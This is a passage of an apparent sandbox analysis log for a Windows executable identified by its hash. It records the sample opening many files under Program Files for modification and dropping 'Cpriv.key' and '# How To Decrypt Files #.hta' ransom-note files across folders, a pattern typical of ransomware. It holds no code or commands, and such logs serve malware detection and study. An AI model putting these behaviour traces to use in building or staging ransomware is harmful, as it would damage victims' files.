Sidebar\Gadgets\CPU.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01176_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\SOLVER\SOLVER.XLAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\gmail.crx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\EMAIL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200430125146.pma de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\AFTRNOON\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101862.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GROOVE_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR17F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Simple.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART11.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107150.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLR.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw120.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\PreviousMenuButtonIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WWINTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_On.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.VisualElementsManifest.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RADIAL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287641.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\misc\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Install\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01843_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7wre_es.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01603_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099198.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18234_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14996_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeAUM_rootCert.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00092_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR34F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\DefaultBlackAndWhite.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_hyperlink.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\BASMLA.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143758.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR36B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\DISTLSTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\Analysis\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00806_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\scenesscroll.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\PIXEL.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\WindowsPowerShell\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN108.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGREPFRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\MANUAL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Icons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PSRCHLTS.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.XLS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL012.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0279644.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-outline.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CGMIMP32.HLP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21533_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS01638_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR9B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SessionOwner.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\msado26.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\GWE.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\EQUATION\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\BREEZE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 